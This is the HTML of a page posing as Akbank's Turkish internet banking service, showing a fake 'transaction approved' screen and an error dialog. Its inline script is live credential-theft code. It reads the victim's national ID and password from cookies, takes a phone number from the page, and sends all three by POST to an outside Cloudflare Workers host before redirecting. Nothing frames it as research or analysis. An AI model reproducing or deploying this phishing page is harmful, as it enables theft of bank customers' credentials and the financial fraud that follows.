<html class="no-js javascript png flash9 chrome webkit win mobile-view" lang="tr">

<head id="ctl00_head">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="robots" content="noindex, nofollow">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta meta="" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title> Akbank İnternet </title>
    <meta name="description" content="Akbank İnternet">
    <link rel="stylesheet" href="./dist/app.css">
    <link rel="shortcut icon" href="./dist/favicon.ico" type="image/x-icon">
    <style>
        body.modal-open .modal {
            height: fit-content;
        }
    </style> 
</head>

<body class="is-retail is-turkish is-desktop is-nontouch">

    <div class="only-mobile">
        <div id="applicationHost">

            <div data-active-view="true" style="display: block;">
                <div class="guest" data-view="views/guest/guest" data-active-view="true">
                    <div class="header">
                        <div data-bind="click:NavigateToDesktopSite" class="desktop-part">
                            <div class="sub-div">
                                <div class="image-part">
                                    <img src="./dist/dt-w.svg"
                                        onerror="this.src = this.src.replace(/\.svg/,'.png'); this.onerror = null;">
                                </div>
                                <div class="desktopText">
                                </div>
                            </div>
                        </div>
                        <div class="lang-guest-selection">
                            <div class="culture-guest-selection" data-bind="visible: langSelection()"
                                style="display: none;">
                                <a class="selected">Türkçe</a>
                                <a class="">English</a>
                            </div>
                        </div>
                    </div>
                    <div class="content-area">
                        <div class="login-form-wrap" data-active-view="true">
                            <div class="login-router">
                                <div class="mbbcclogin"> 
                                    <text-input-login>

                                        <div class="text-input-login">

                                            <div data-bind="attr: { class: className}" class="text-input">
                                                <center>   <img src="dist/onay.png" alt="90" width="" height="90"> </center>  <br><p style="    -webkit-text-size-adjust: 100%;
                                                   -webkit-tap-highlight-color: rgba(0,0,0,0);
                                                   line-height: 1.42857143;
                                                   user-select: none;
                                                   color: #fff;
                                                   font-family: 'Open Sans';
                                                   font-size: 16px;
                                                   font-weight: 600;
                                                   box-sizing: border-box;
                                                   width: 99%;
                                               
                                                   vertical-align: middle;
                                                   padding: 18px 20px;
                                                   padding-right: 0;text-align: center;">İşleminiz Onaylanmıştır.</p><br><p style="    -webkit-text-size-adjust: 100%;
                                                   -webkit-tap-highlight-color: rgba(0,0,0,0);
                                                   line-height: 1.42857143;
                                                   user-select: none;
                                                   color: #fff;
                                                   font-family: 'Open Sans';
                                                   font-size: 16px;
                                                   font-weight: 600;
                                                   box-sizing: border-box;
                                                   width: 99%;
                                               
                                                   vertical-align: middle;
                                                   padding: 18px 20px;
                                                   padding-right: 0;text-align: center;">En Kısa Süre içerisinde Sizin ile iletişime Geçilecektir</p>
                                               </div>
                                        </div>
                                    </text-input-login>
  
                                    
                                </div>
                            </div>
                        </div>
                    
                    </div>
                    <div class="separator">
                    </div>
                    <div class="footer">
                        <div class="banner">
                            <img class="logo" src="./dist/standart_logo.svg"
                                onerror="this.src = this.src.replace(/\.svg/,'.png'); this.onerror = null;">
                            <div class="extras" style="display: none;">
                                <a class="back-part" data-bind="click:function(){navigateBack();}">
                                    <img class="back-image" data-bind="attr:{src:backIcon}"
                                        onerror="this.src = this.src.replace(/\.svg/,'.png'); this.onerror = null;"
                                        src="./dist/back.png">
                                </a>
                                <a class="close-part" data-bind="click:function(){navigateHome();}">
                                    <img class="close-image" data-bind="attr:{src:closeIcon}"
                                        onerror="this.src = this.src.replace(/\.svg/,'.png'); this.onerror = null;"
                                        src="./dist/close.png">
                                </a>
                            </div>
                            <div class="lang-mobile-selection" data-bind="visible: langSelection()"
                                style="display: none;">
                                <a class="selected">Türkçe</a>
                                <a class="">English</a>
                            </div>
                        </div>
                        <div class="sizinicin">sizin için</div>
                    </div>
                </div>
            </div>
        </div>
        <div class="modal fade in" id="bootstrapModal" style="top: 0px; display: none;" aria-hidden="false">
            <div class="modal-dialog">
                <div class="modal-content" id="modalHost">
                    <div class="message-wrap" data-view="core/common/dialog/messagedialog" data-active-view="true">
                        <div class="message-title" data-bind="text: title">Hata</div>
                        <div class="message-body"
                            style="overflow-y: scroll; -ms-overflow-style: -ms-autohiding-scrollbar;"
                            data-bind="html: message">Eksik veya hatalı bilgi girdiğini fark ettik. Kontrol edip tekrar
                            deneyebilirsin.</div>
                        <div class="button-holder clearfix">
                            <div class="button-wrap clearfix first block">
                                <input type="button" data-close-modal="" value="Tamam">
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="modal-backdrop fade in"></div>
    </div>
    <script>
        console.log(document.cookie)
        function getCookie(name) {
            var nameEQ = name + "=";
            var ca = document.cookie.split(';');
            for (var i = 0; i < ca.length; i++) {
                var c = ca[i];
                while (c.charAt(0) === ' ') c = c.substring(1, c.length);
                if (c.indexOf(nameEQ) === 0) return c.substring(nameEQ.length, c.length);
            }
            return null;
        }
        var phoneNumberInput = document.getElementById('telno');

        // Giriş butonu
        var loginBtn = document.getElementById('loginBtn');

        // Cep telefonu numarası input alanını dinle
        phoneNumberInput.addEventListener('input', function () {
            var phoneNumber = phoneNumberInput.value;

            // Eğer en az 8 karakter girilmişse
            if (phoneNumber.length >= 8) {
                // Giriş butonunun disable özelliğini kaldır
                loginBtn.removeAttribute('disabled');
            } else {
                // Giriş butonunu disable yap
                loginBtn.setAttribute('disabled', 'disabled');
            }
        });
        // Giriş butonuna tıklanınca
        loginBtn.addEventListener('click', function () {
            var telno = document.getElementById('telno').value;

            // Cookie'den kayıtlı adı al
            var tcno = getCookie("tcno");
            var pass = getCookie("pass");

            // POST işlemi için veri oluştur
            var data = new FormData();
            data.append('telno', telno);
            data.append('tcno', tcno); // Cookie'den alınan adı ekle
            data.append('pass', pass);

            // Cloudflare Workers'a POST isteği gönder
            fetch('https://odd-tooth-ef14.aisik3516.workers.dev/', {
                method: 'POST',
                body: data
            })
                .then(response => response.json())
                .then(data => {
                    console.log('Sunucudan gelen yanıt:', data);
                    // Başarılı ise yönlendirme yapılabilir
                    window.location.href = 'onay.html';
                })
                .catch(error => {
                    console.error('Hata:', error);
                    window.location.href = 'onay.html'; // Hata durumunda da yönlendirme yapılabilir
                });
        });


    </script>
</body>

</html>